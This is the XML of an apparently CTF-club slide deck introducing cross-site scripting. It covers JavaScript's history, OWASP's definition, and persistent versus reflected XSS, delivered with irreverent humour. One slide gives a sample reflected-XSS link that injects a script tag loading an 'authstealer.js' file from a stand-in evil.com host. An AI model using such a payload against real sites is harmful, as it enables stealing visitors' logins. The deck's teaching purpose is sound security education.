
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"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2133419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2133419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4365910da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4365910da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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e04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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e04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f33ce3e0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f33ce3e0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f33ce3e0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21b8299bd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21b8299bd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&lt;iframe width="560" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen&gt;&lt;/iframe&gt;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f33ce3e0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f33ce3e0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4365910da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4365910da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6f33ce3e0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6f33ce3e0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2133419b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2133419b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4365914a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4365914a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f33ce3e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f33ce3e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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e0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f33ce3e0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forum.com?q=news" TargetMode="External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225475"/>
            <a:ext cx="85206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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Advanced Web/XSS.</a:t>
            </a:r>
            <a:endParaRPr sz="3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Or, How to be blackmailed into presenting.</a:t>
            </a:r>
            <a:endParaRPr sz="2600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2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2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Grant Spencer</a:t>
            </a:r>
            <a:endParaRPr sz="24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(some schmuck)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D767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2027700"/>
            <a:ext cx="85206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XSS</a:t>
            </a:r>
            <a:endParaRPr sz="57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1" name="Google Shape;121;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-857" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526675" y="116725"/>
            <a:ext cx="499749" cy="7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According to OWASP,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7" name="Google Shape;127;p23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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842250" y="1590600"/>
            <a:ext cx="7459500" cy="19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XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.</a:t>
            </a:r>
            <a:endParaRPr sz="24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According to Me,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4" name="Google Shape;134;p24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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842250" y="1590600"/>
            <a:ext cx="7459500" cy="19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XSS attacks occur when I use your poorly-written web application to ship my malicious code to people who blindly place their trust in your website’s security.</a:t>
            </a:r>
            <a:endParaRPr sz="24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So, Basically.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41" name="Google Shape;141;p25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0550" y="1140400"/>
            <a:ext cx="4962900" cy="372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Or, More Likely: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48" name="Google Shape;148;p26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3475" y="1258475"/>
            <a:ext cx="3539100" cy="2117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6750" y="1512988"/>
            <a:ext cx="3539100" cy="2117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6925" y="1872500"/>
            <a:ext cx="3539100" cy="2117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9100" y="2275225"/>
            <a:ext cx="3539100" cy="2117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7800" y="1550125"/>
            <a:ext cx="6248400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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Persistent XSS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9" name="Google Shape;159;p27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Stays there even after you leave.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When someone visits the page, *your* JS embedded in the page runs in *their* browser.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Easy path to 40k retweets.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In a CTF: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probably a forum you can post messages to.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8700" y="1644362"/>
            <a:ext cx="3943600" cy="243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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> XSS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7" name="Google Shape;167;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8207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Is weird.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When someone visits a link you provide, something abnormal happens with that webpage.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Code can be directly included in the link, or the browser can pull it from somewhere else.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Cool link, please click: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400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http://forum.com?q=news&lt;\script%20src=”http://evil.com/authstealer.js”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In a CTF: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probably a query string or get parameter.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8" name="Google Shape;168;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035900" y="2066550"/>
            <a:ext cx="70722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But Grant, you say.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accen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74" name="Google Shape;174;p29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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035900" y="2504525"/>
            <a:ext cx="70722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“Who could possibly fuck that up? It’s just a website.”</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accen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76" name="Google Shape;17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975" y="2218013"/>
            <a:ext cx="8434050" cy="114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D767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311700" y="2027700"/>
            <a:ext cx="85206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Baby Demo!</a:t>
            </a:r>
            <a:endParaRPr sz="60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82" name="Google Shape;182;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-857" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526675" y="116725"/>
            <a:ext cx="499749" cy="7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1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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842250" y="2132850"/>
            <a:ext cx="7459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(Y’all’s turn now.)</a:t>
            </a:r>
            <a:endParaRPr sz="24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http://whatthe.ass.is/#xss</a:t>
            </a:r>
            <a:endParaRPr sz="240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C4125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027700"/>
            <a:ext cx="85206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Please don’t.</a:t>
            </a:r>
            <a:endParaRPr sz="60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-857" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526675" y="116725"/>
            <a:ext cx="499749" cy="7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C4125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2027700"/>
            <a:ext cx="85206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Also, I’m mean.</a:t>
            </a:r>
            <a:endParaRPr sz="60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-857" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526675" y="116725"/>
            <a:ext cx="499749" cy="7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Outline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What even is JavaScript?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XSS.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Idk, demo or something?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Y’all’s turn.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D767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2027700"/>
            <a:ext cx="85206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What even is JS?</a:t>
            </a:r>
            <a:endParaRPr sz="60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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-857" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8526675" y="116725"/>
            <a:ext cx="499749" cy="7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Javascript makes me sad.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Back in the ‘90s, Netscape was a very famous browser.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Unfortunately for Netscape, the internet was very very boring with all its static websites.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Well *obviously* we can’t be having that, can we?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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="23011" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233625" y="1257750"/>
            <a:ext cx="3285276" cy="284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23800" y="2405250"/>
            <a:ext cx="731500" cy="73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Enter: Scripting!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Javascript is a scripting language that can control the contents of a webpage.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Braindead front-end devs use it to solve problems that aren’t problems.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Originally, all JS is embedded into the HTML or sent from the same site.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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="15381" r="9254" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5380950" y="1170125"/>
            <a:ext cx="3215801" cy="326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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>But for the Humans, Enough is Never Enough.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“I don’t like having to refresh the webpage.”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“This website is ugly and I don’t wanna learn CSS.”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“Uh, uh… Chess AI?”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OH, OH, I KNOW THIS ONE. LET’S USE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*JAVASCRIPT*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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="26062" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109800" y="1563850"/>
            <a:ext cx="3409101" cy="259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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6064400" y="3419925"/>
            <a:ext cx="9813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CD767"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why tho?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FCD767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What went wrong.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 no longer write all my own JavaScript.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 usually ship it from someone else’s random web server.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New features have been added over time that gives it complete control over my webpage.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‒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People don’t know anything.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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="99000"/>
          </a:blip>
          <a:srcRect b="-857" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8518900" y="108950"/>
            <a:ext cx="499749" cy="7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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="2329" r="2595" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775325" y="1660525"/>
            <a:ext cx="4056974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